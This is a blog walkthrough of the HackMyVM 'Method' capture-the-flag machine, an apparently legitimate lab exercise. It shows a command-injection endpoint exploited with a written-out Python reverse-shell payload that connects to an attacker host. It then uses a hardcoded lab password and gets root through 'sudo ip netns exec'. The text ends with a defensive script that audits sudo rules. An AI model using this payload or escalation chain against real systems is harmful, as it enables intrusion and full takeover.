Windy's little blog

All the odds and ends of everyday life, and I like CTF.

HackMyVm Method Walkthrough


Scan ports first.

 nmap -sV -sC -p- -oN ports.log 192.168.56.100
 Nmap scan report for bogon (192.168.56.100)
 Host is up (0.0025s latency).
 Not shown: 65533 closed ports
 PORT   STATE SERVICE VERSION
 22/tcp open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
 | ssh-hostkey:
 |   3072 4b:24:34:1f:41:10:88:b7:5a:6a:63:d9:f6:75:26:6f (RSA)
 |   256 52:46:e7:20:68:c1:6f:90:2f:a6:ad:ee:6d:87:e7:28 (ECDSA)
 |_  256 3f:ce:97:a9:1e:f4:60:f4:0e:71:e7:46:58:28:71:f0 (ED25519)
 80/tcp open  http    nginx 1.18.0
 |_http-server-header: nginx/1.18.0
 |_http-title: Test Page for the Nginx HTTP Server on Fedora
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Enumerate port 80; remember to include the .htm extension in the wordlist scan.

 ~ gobuster dir -u http://192.168.56.100 -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .htm,.html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard -o 80.log --exclude-length 3690
 ===============================================================
 /index.htm            (Status: 200) [Size: 344]
 /note.txt             (Status: 200) [Size: 23]
 /secret.php           (Status: 302) [Size: 0] [--> https://images-na.ssl-images-amazon.com/images/I/31YDo0l4ZrL._SX331_BO1,204,203,200_.jpg]

Check source code of index.htm.

 ~ curl http://192.168.56.100/index.htm
 <h1>It's Hacking Time</h1>
 <img src="hacker.gif" alt="Hacker" height="640" width="640">
 <img hidden="true" src="office.gif" alt="hahahahaha" height="640" width="640">
 <form action="/secret.php" hidden="true" method="GET">
      <input type="text" name="HackMyVM" value="" maxlength="100"><br>
      <input type="submit" value="Submit">
 </form>

With the hint from the hidden form in index.htm, we can call secret.php with the parameter HackMyVM.

 ~ curl 'http://192.168.56.100/secret.php?HackMyVM=id'
 Now the main part what it is loooooool<br>Try other method

It seems the GET method is not the right one. Let's try the POST method.

 ~ curl 'http://192.168.56.100/secret.php' -d 'HackMyVM=id'
 You Found ME : - (<pre>uid=33(www-data) gid=33(www-data) groups=33(www-data)
 </pre>

The parameter is executed as a shell command, so we can get a reverse shell.

 ~ curl 'http://192.168.56.100/secret.php' -d 'HackMyVM=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.56.150%22,1234));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call(%5B%22%2fbin%2fbash%22,%22-i%22%5D);%27'
 ──────────────────────────────────────────────────────────────────────────────────
 
 & kali @ mykali in ~/Documents/method 0 [10:05:51]
 ~ nc -nvlp 1234
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.100.
 Ncat: Connection from 192.168.56.100:45958.
 bash: cannot set terminal process group (333): Inappropriate ioctl for device
 bash: no job control in this shell
 www-data@method:~/html$ id
 id
 uid=33(www-data) gid=33(www-data) groups=33(www-data)
 www-data@method:~/html$

Check the source code of secret.php.

 www-data@method:~/html$ cat secret.php
 cat secret.php
 <?php
 ...
 else {
 header("Location: https://images-na.ssl-images-amazon.com/images/I/31YDo0l4ZrL._SX331_BO1,204,203,200_.jpg");
 }
 $ok="prakasaka:th3-!llum!n@t0r";
 ?>
 

Escalate to user prakasaka.

 www-data@method:~/html$ su prakasaka
 su prakasaka
 Password: th3-!llum!n@t0r
 id
 uid=1000(prakasaka) gid=1000(prakasaka) groups=1000(prakasaka),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),112(bluetooth)

Log in via SSH as user prakasaka and check sudo -l.

 prakasaka@method:~$ sudo -l
 Matching Defaults entries for prakasaka on method:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
 
 User prakasaka may run the following commands on method:
     (!root) NOPASSWD: /bin/bash
     (root) /bin/ip

Since /bin/ip may be run as root, ip netns exec lets us run a shell as root.

 prakasaka@method:~$ sudo ip netns add foo
 prakasaka@method:~$ sudo ip netns exec foo /bin/sh
 
 # id;hostname
 uid=0(root) gid=0(root) groups=0(root)
 method
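As an added example (not from the original post), a small Python audit of `sudo -l` output like the one above: it parses the command entries and flags those that run as root and point at a binary that can spawn a shell (such as /bin/ip via ip netns exec). The SHELL_CAPABLE watch-list is a constructed, deliberately short assumption.

```python
import re
from typing import List, NamedTuple

# Constructed sample input: the `sudo -l` output captured in the walkthrough above.
SUDO_L_OUTPUT = """\
Matching Defaults entries for prakasaka on method:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User prakasaka may run the following commands on method:
    (!root) NOPASSWD: /bin/bash
    (root) /bin/ip
"""

# Hypothetical short watch-list: binaries that can spawn a shell or run an
# arbitrary program when invoked with root privileges (ip via `ip netns exec`).
SHELL_CAPABLE = {"/bin/bash", "/bin/sh", "/bin/ip", "/usr/bin/vim", "/usr/bin/find"}

class SudoEntry(NamedTuple):
    runas: str       # the "(runas)" spec, e.g. "root", "!root", "ALL"
    nopasswd: bool   # True if the NOPASSWD tag is present
    command: str     # the command (first token is the binary path)

ENTRY_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+?)\s*$")

def parse_sudo_l(text: str) -> List[SudoEntry]:
    """Parse the command section of `sudo -l` output into SudoEntry records."""
    entries, in_commands = [], False
    for line in text.splitlines():
        if line.startswith("User ") and "may run the following" in line:
            in_commands = True
            continue
        m = ENTRY_RE.match(line) if in_commands else None
        if m:
            runas = m.group("runas").split(":")[0].strip()  # drop an optional ":group"
            tags = {t.rstrip(":") for t in m.group("tags").split()}
            entries.append(SudoEntry(runas, "NOPASSWD" in tags, m.group("cmd")))
    return entries

def allows_root(runas: str) -> bool:
    """True if the runas spec lets the command run as root ("(root)", "(ALL)", ...)."""
    users = [u.strip() for u in runas.split(",")]
    if "!root" in users or "!ALL" in users:
        return False
    return any(u in ("root", "ALL") for u in users)

def risky_entries(entries: List[SudoEntry]) -> List[SudoEntry]:
    """Entries that can run as root and whose binary is on the shell-capable list."""
    return [e for e in entries
            if allows_root(e.runas) and (e.command == "ALL" or e.command.split()[0] in SHELL_CAPABLE)]

if __name__ == "__main__":
    for e in risky_entries(parse_sudo_l(SUDO_L_OUTPUT)):
        print(f"risky: ({e.runas}) {'NOPASSWD ' if e.nopasswd else ''}{e.command}")
```

On the output above the (!root) /bin/bash entry is not flagged, because it explicitly excludes root, while (root) /bin/ip is.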
